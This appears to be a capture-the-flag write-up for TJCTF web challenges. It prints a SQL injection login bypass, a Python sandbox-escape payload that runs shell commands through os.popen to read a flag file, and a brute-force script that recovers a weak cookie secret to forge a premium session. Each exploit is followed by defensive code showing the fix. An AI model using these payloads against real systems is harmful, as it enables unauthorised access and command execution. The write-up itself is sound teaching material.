Nothing interesting on the website, but there is something interesting in the page source.
Flag: tjctf{pretty_canvas_577f7045}
This is vulnerable to a basic ' or 1=1 ; -- SQL injection.
Flag: tjctf{swill_sql_1y1029345029374}
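The login bypass above works because the input is spliced into the SQL text. As an added example (not the challenge's code), the same query is shown built by string formatting and as a parameterised query against a constructed in-memory SQLite table; the table, rows and function names are assumptions.

```python
import sqlite3

# Constructed in-memory users table so both login variants can be run offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('jerome', 'correct-horse')")
    conn.commit()
    return conn

def login_unsafe(conn, username, password):
    """Vulnerable pattern: user input is pasted into the SQL text, so a quote in
    the input closes the string literal and the remainder is parsed as SQL."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None

def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the SQL text, so the
    same input is compared as a plain string and matches no row."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None

PAYLOAD = "' or 1=1 ; --"   # the injection string from the writeup

if __name__ == "__main__":
    db = make_db()
    print("unsafe:", login_unsafe(db, PAYLOAD, "wrong"))              # True: bypassed
    print("safe:", login_safe(db, PAYLOAD, "wrong"))                  # False: rejected
    print("safe, real creds:", login_safe(db, "jerome", "correct-horse"))  # True
```

With the payload, the formatted query becomes `... WHERE username = '' or 1=1 ; --' AND password = 'wrong'`: the `or 1=1` makes the row filter always true and `--` comments out the password check. The parameterised version never re-parses the input, which is the fix to apply rather than filtering quotes.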
Some blacklisted items here, but it's essentially an SSTI, sort of. I tried a basic payload.
print(''.__class__.__mro__[1].__subclasses__())
The 4th-last item is my favourite.
print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('ls').read())
print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('cat flag-cce1c56d-466d-4af9-8ae7-c7bcf99d5c49.txt').read())
Flag: tjctf{oops_bad_filter_3b582f74}
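The filter failed because it tried to blacklist tokens inside text that was still handed to a Python evaluator. As an added example (not the challenge's code), here is the opposite design: an allowlist renderer built on `string.Template`, which only substitutes named placeholders and never evaluates expressions, so attribute chains like the one above are inert text. The placeholder names, context and allowlist are assumptions.

```python
from string import Template

# Constructed allowlist: the only placeholders a template may reference.
ALLOWED = frozenset({"username", "user_type"})

def render(template_text, context, allowed=ALLOWED):
    """Substitute $name / ${name} placeholders from an allowlist and nothing else.
    Raises ValueError for any placeholder outside the allowlist (dunder names,
    dotted paths and the like), so untrusted template text cannot reach eval."""
    tpl = Template(template_text)
    for m in tpl.pattern.finditer(template_text):
        if m.group("invalid") is not None:
            raise ValueError("malformed placeholder")
        name = m.group("named") or m.group("braced")
        if name is not None and name not in allowed:
            raise ValueError("placeholder not allowed: " + name)
    # Only allowlisted keys are exposed; everything else in context stays hidden.
    return tpl.substitute({k: str(context[k]) for k in allowed if k in context})

def is_rejected(template_text, context, allowed=ALLOWED):
    """True if the renderer refuses the template."""
    try:
        render(template_text, context, allowed)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    ctx = {"username": "jerome", "user_type": "basic", "secret": "do-not-leak"}
    print(render("Hi $username, plan: ${user_type}", ctx))
    # The writeup's payload has no placeholder syntax, so it is returned verbatim.
    print(render("''.__class__.__mro__[1].__subclasses__()", ctx))
    print(is_rejected("$secret", ctx), is_rejected("${__class__}", ctx))
```

The security property here is structural: there is no code path from template text to `eval`, `getattr` or attribute traversal, so there is nothing to blacklist. A blacklist of strings such as `__class__` or `popen` only protects until someone finds a spelling the filter did not anticipate.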
To bypass this, the 6-character key has to be brute-forced.
Getting premium allows us to load anything, like the flag.
import requests
import hashlib
import itertools

characters = 'abcdefghijklmnopqrstuvwxyz0123456789'
length = 6
combinations = itertools.product(characters, repeat=length)
url = 'https://pay-to-win.tjc.tf/'

# Cookie bodies are base64 of the session JSON; the "hash" cookie is sha256(data + secret).
new = "eyJ1c2VybmFtZSI6ICJqZXJvbWUiLCAidXNlcl90eXBlIjogInByZW1pdW0ifQ=="  # '{"username": "jerome", "user_type": "premium"}'
old = "eyJ1c2VybmFtZSI6ICJqZXJvbWUiLCAidXNlcl90eXBlIjogImJhc2ljIn0="      # '{"username": "jerome", "user_type": "basic"}'
h = "46378b50e362bb73a60886b2d55957b6a79acd1ae8d6069a7bce2fbbda3f640c"  # hash the server issued for the basic cookie

def sha256_hex(data):
    return hashlib.sha256(bytes(data, 'utf-8')).hexdigest()

actual_secret = ""
actual_hash = ""
# Try every 6-character secret until sha256(old + secret) matches the issued hash,
# then sign the premium cookie body with the recovered secret.
for c in combinations:
    secret = ''.join(c)
    hashed = sha256_hex(old + secret)
    if hashed == h:
        actual_secret = secret
        actual_hash = sha256_hex(new + secret)
        break

print(actual_secret)
print(actual_hash)

r = requests.get(url + "?theme=/secret-flag-dir/flag.txt", cookies={'data': new, 'hash': actual_hash})
print(r.text)
Flag: tjctf{not_random_enough_64831eff}
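The cookie fell because the secret appended to the data came from a space of only 36**6 (about 2.2 billion) candidates, which is a few minutes of SHA-256 on a laptop. As an added example (not the challenge server's code), here is the same cookie layout, base64 JSON in `data` and a hex digest in `hash`, signed with HMAC-SHA256 under a 32-byte random key and verified with a constant-time compare; the key handling, function names and the tampered-cookie helper are assumptions.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Constructed server key: 32 random bytes (256 bits) loaded once at startup. Unlike a
# 6-character [a-z0-9] secret (36**6 = 2,176,782,336 guesses), this cannot be searched.
SERVER_KEY = secrets.token_bytes(32)

def sign(data, key=SERVER_KEY):
    """HMAC-SHA256 tag over the encoded cookie body."""
    return hmac.new(key, data.encode(), hashlib.sha256).hexdigest()

def make_cookie(session, key=SERVER_KEY):
    """Server side: encode the session and attach its tag."""
    data = base64.b64encode(json.dumps(session).encode()).decode()
    return {"data": data, "hash": sign(data, key)}

def read_cookie(cookie, key=SERVER_KEY):
    """Server side: return the session only if the tag verifies. compare_digest
    keeps the comparison constant-time so timing does not reveal matching bytes."""
    expected = sign(cookie["data"], key)
    if not hmac.compare_digest(expected, cookie["hash"]):
        return None
    return json.loads(base64.b64decode(cookie["data"]))

def tamper_user_type(cookie):
    """What a client can do without the key: rewrite the body to premium and
    keep the old tag. read_cookie must reject the result."""
    session = json.loads(base64.b64decode(cookie["data"]))
    session["user_type"] = "premium"
    data = base64.b64encode(json.dumps(session).encode()).decode()
    return {"data": data, "hash": cookie["hash"]}

if __name__ == "__main__":
    issued = make_cookie({"username": "jerome", "user_type": "basic"})
    print(read_cookie(issued))                      # session restored
    print(read_cookie(tamper_user_type(issued)))    # None: tag no longer matches
```

Two properties matter here and both were missing in the challenge: the key is long and random, so recovering it by enumeration is infeasible, and it is used through HMAC rather than `sha256(data + secret)`, so the construction stays safe even if the key is later rotated or the message layout changes.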